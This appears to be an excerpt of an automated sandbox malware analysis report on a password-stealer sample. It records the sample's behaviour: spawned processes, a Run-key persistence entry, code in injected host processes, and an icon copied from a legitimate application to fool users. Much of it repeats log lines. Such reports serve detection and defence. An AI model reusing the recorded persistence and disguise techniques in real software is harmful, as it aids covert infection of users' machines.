            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbx. source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3942485337.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000000.2386545627.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Drawing.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ, source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb- source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: wmplayer.pdbGCTL source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wmplayer.pdb source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346858D4 push ds; ret 0_2_00007FFD346858D5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468B86B push eax; retf 0_2_00007FFD3468B889
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34760003 push esp; retf 4810h0_2_00007FFD34760312
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD347606C9 pushad ; ret 0_2_00007FFD347606E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041C98B push 07E53DEBh; iretd 6_2_0041C990
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004239A3 push edi; ret 6_2_004239AB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A28D push cs; ret 6_2_0041A290
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004082A0 pushfd ; ret 6_2_004082BC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00403320 push eax; ret 6_2_00403322
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00418BD3 push esi; ret 6_2_00418BD4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00417E4C pushfd ; iretd 6_2_00417E4D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00417F44 push eax; ret 6_2_00417F5D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00401F8C push ebx; retf 6_2_00401F98
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D09AD push ecx; mov dword ptr [esp], ecx6_2_032D09B6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035709AD push ecx; mov dword ptr [esp], ecx13_2_035709B6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E121FD push FFFFFFDCh; iretd 13_2_02E1222B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E10140 push edi; retn EB3Ah13_2_02E1016F
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E20680 push edi; ret 13_2_02E20688
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E19668 push 07E53DEBh; iretd 13_2_02E1966D
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1E540 push cs; ret 13_2_02E1E608
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E14B29 pushfd ; iretd 13_2_02E14B2A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E158B0 push esi; ret 13_2_02E158B1
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1CF89 push esi; retf 13_2_02E1CF9B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1CF90 push esi; retf 13_2_02E1CF9B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E16F6A push cs; ret 13_2_02E16F6D
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E04F7D pushfd ; ret 13_2_02E04F99
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E11CA0 push ebx; iretd 13_2_02E11CA1
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E14C21 push eax; ret 13_2_02E14C3A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033B9311 pushfd ; ret 13_2_033B9323
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033B9215 push cs; ret 13_2_033B9216
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033B37EE push B012FEBEh; iretd 13_2_033B37FB
            Source: C:\Windows\SysWOW64\sc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PTR4CRBHJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PTR4CRBHJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
